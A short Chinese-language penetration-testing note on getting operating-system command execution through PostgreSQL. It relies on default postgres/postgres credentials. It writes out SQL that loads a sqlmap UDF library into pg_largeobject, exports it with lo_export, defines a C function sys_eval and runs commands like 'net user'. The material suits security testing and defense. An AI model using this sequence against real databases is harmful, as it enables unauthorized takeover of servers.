postgres简介
Postgres(以下或简称 pg)在国内并不常见,而在国外的流行程度却不下 mysql。最近在内网做渗透测试的时候兄弟们发现了很多网站是postgresql的数据库,默认口令为postgres postgres。从web段都没有拿到权限,所以研究了一下pg的命令执行。
pg命令执行
Pg的命令执行有点类似于mysql的udf提权都是要上传dll文件,其实整个过程都与udf提取相似。
1.查询oid,oid为当前对象大数据的标识符,我们要利用这个存储UDF文件内容。
2.oid与上面保持一致,等于变相清空"页面",不要干扰库的生成
delete from pg_largeobject where loid=1596054;
3.把16进制的so文件塞进去(根据版本可以在sqlmap下找到so文件大概位置在
sqlmap-master\sqlmap-master\udf\postgresql\windows\32)
insert into pg_largeobject (loid,pageno,data) values(1596054, 0, decode('7F454CXXXXXXXXX000', 'hex'));
现将dll文件转化为16进制的编码然后在写入进去,转化为16进制的文件太大,不能一次插入进去所以得分几次。写了一个脚本把它分文4次插入,把生成好的四句insert在命令行中执行。
4.导出dll
SELECT lo_export(1596054, 'monkey.dll');
5.创建函数
CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 'monkey.dll', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
6.命令执行
select sys_eval('net user');
由于版本是8.2的网上流传的dll都没有反弹shell的函数,9以上的版本都存在反弹shell的函数,以后遇到可以试一试方法基本都差不多,所以只能做到这里。这个命令执行的权限也只是pg的权限,限制还是有点大。
之前也是在项目上碰到过,在tools也查到了一些资料 ,整合了一下才有此文,不足之处还请见谅。